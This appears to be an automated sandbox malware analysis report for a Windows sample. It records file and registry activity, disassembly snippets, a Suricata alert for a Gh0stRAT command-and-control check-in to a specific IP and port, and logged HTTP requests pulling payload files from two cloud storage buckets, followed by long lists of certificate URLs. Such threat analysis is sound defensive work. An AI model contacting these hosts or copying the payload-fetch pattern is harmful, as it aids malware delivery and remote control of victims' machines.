Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4_2_00007FFE1A52A1B8 FindFirstFileExW,4_2_00007FFE1A52A1B8
Source: C:\Users\user\Documents\0b1G0H.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeFile opened: C:\Users\userJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]4_2_000000014000DFFE
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]4_2_000000014000DDFF
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4x nop then movsxd rbx, qword ptr [r14+10h]4_2_0000000140011270
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]4_2_000000014000DE96
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]4_2_000000014000DEFB
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]4_2_000000014000E178
Source: C:\Users\user\Documents\0b1G0H.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]4_2_000000014000DDD9

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.4:50018 -> 8.217.35.253:8917
Source: global trafficTCP traffic: 192.168.2.4:50018 -> 8.217.35.253:8917
Source: Joe Sandbox ViewIP Address: 118.178.60.9 118.178.60.9
Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 39.103.20.17:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 39.103.20.17:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 39.103.20.17:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 39.103.20.17:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 39.103.20.17:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 39.103.20.17:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 39.103.20.17:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 39.103.20.17:443
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.35.253
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.35.253
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.35.253
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.35.253
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.35.253
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /i.dat HTTP/1.1Connection: Keep-AliveUser-Agent: DoHost: vien3h.oss-cn-beijing.aliyuncs.com
Source: global trafficHTTP traffic detected: GET /a.gif HTTP/1.1Connection: Keep-AliveUser-Agent: DoHost: vien3h.oss-cn-beijing.aliyuncs.com
Source: global trafficHTTP traffic detected: GET /b.gif HTTP/1.1Connection: Keep-AliveUser-Agent: DoHost: vien3h.oss-cn-beijing.aliyuncs.com
Source: global trafficHTTP traffic detected: GET /c.gif HTTP/1.1Connection: Keep-AliveUser-Agent: DoHost: vien3h.oss-cn-beijing.aliyuncs.com
Source: global trafficHTTP traffic detected: GET /d.gif HTTP/1.1Connection: Keep-AliveUser-Agent: DoHost: vien3h.oss-cn-beijing.aliyuncs.com
Source: global trafficHTTP traffic detected: GET /s.dat HTTP/1.1Connection: Keep-AliveUser-Agent: DoHost: vien3h.oss-cn-beijing.aliyuncs.com
Source: global trafficHTTP traffic detected: GET /s.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: DoHost: vien3h.oss-cn-beijing.aliyuncs.com
Source: global trafficHTTP traffic detected: GET /drops.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /f.dat HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /FOM-50.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /FOM-51.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /FOM-52.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /FOM-53.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /drops.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: vien3h.oss-cn-beijing.aliyuncs.com
Source: global trafficDNS traffic detected: DNS query: 22mm.oss-cn-hangzhou.aliyuncs.com
Source: global trafficDNS traffic detected: DNS query: ikhhya.net
Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 138745635-72645747.116.exe, 00000000.00000003.1948652367.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1945820735.0000000004568000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948284172.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948450518.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948686028.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948493114.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948248164.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948816630.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948090702.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, 0b1G0H.exe.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0I
Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0P
Source: 138745635-72645747.116.exe, 00000000.00000003.1948652367.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1945820735.0000000004568000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948284172.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948450518.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948686028.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948493114.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948248164.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948816630.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948090702.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, 0b1G0H.exe.0.drString found in binary or memory: http://ocsp.thawte.com0
Source: 138745635-72645747.116.exe, 00000000.00000003.1948652367.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1945820735.0000000004568000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948284172.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948450518.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948686028.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948493114.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948248164.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948816630.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948090702.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 0b1G0H.exe.0.drString found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: 138745635-72645747.116.exe, 00000000.00000003.1948652367.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1945820735.0000000004568000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948284172.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948450518.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948686028.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948493114.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948248164.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948816630.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948090702.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 0b1G0H.exe.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: 138745635-72645747.116.exe, 00000000.00000003.1948652367.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1945820735.0000000004568000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948284172.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948450518.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948686028.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948493114.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948248164.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948816630.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948090702.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 0b1G0H.exe.0.drString found in binary or memory: http://s.symcd.com06
Source: 138745635-72645747.116.exe, 00000000.00000003.1948652367.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1945820735.0000000004568000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948284172.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948450518.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948686028.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948493114.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948248164.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948816630.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948090702.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 0b1G0H.exe.0.drString found in binary or memory: http://s.symcd.com0_
Source: 138745635-72645747.116.exe, 00000000.00000003.1948652367.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1945820735.0000000004568000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948284172.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948450518.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948686028.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948493114.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948248164.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948816630.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948090702.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 0b1G0H.exe.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: 138745635-72645747.116.exe, 00000000.00000003.1948652367.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1945820735.0000000004568000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948284172.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948450518.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948686028.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948493114.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948248164.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948816630.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948090702.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 0b1G0H.exe.0.drString found in binary or memory: http://s2.symcb.com0
Source: 138745635-72645747.116.exe, 00000000.00000003.1948652367.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1945820735.0000000004568000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948284172.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948450518.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948686028.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948493114.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948248164.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948816630.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948090702.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 0b1G0H.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: 138745635-72645747.116.exe, 00000000.00000003.1948652367.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1945820735.0000000004568000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948284172.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948450518.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948686028.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948493114.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948248164.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948816630.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948090702.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 0b1G0H.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
Source: 138745635-72645747.116.exe, 00000000.00000003.1948652367.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1945820735.0000000004568000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948284172.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948450518.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948686028.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948493114.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948248164.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948816630.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948090702.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 0b1G0H.exe.0.drString found in binary or memory: http://sv.symcd.com0&
Source: 138745635-72645747.116.exe, 00000000.00000003.1948652367.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1945820735.0000000004568000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948284172.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948450518.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948686028.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948493114.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948248164.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948816630.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948090702.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 0b1G0H.exe.0.drString found in binary or memory: http://sw.symcb.com/sw.crl0
Source: 138745635-72645747.116.exe, 00000000.00000003.1948652367.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1945820735.0000000004568000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948284172.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948450518.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948686028.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948493114.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948248164.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948816630.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948090702.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 0b1G0H.exe.0.drString found in binary or memory: http://sw.symcd.com0
Source: 138745635-72645747.116.exe, 00000000.00000003.1948652367.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1945820735.0000000004568000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948284172.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948450518.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948686028.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948493114.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948248164.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948816630.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948090702.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 0b1G0H.exe.0.drString found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: 138745635-72645747.116.exe, 00000000.00000003.1948652367.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1945820735.0000000004568000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948284172.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948450518.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948686028.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948493114.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948248164.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948816630.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948090702.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 0b1G0H.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: 138745635-72645747.116.exe, 00000000.00000003.1948652367.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1945820735.0000000004568000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948284172.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948450518.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948686028.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948493114.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948248164.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948816630.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948090702.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, 0b1G0H.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: 138745635-72645747.116.exe, 00000000.00000003.1948652367.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1945820735.0000000004568000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948284172.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948450518.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948686028.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948493114.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948248164.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948816630.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948090702.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 0b1G0H.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
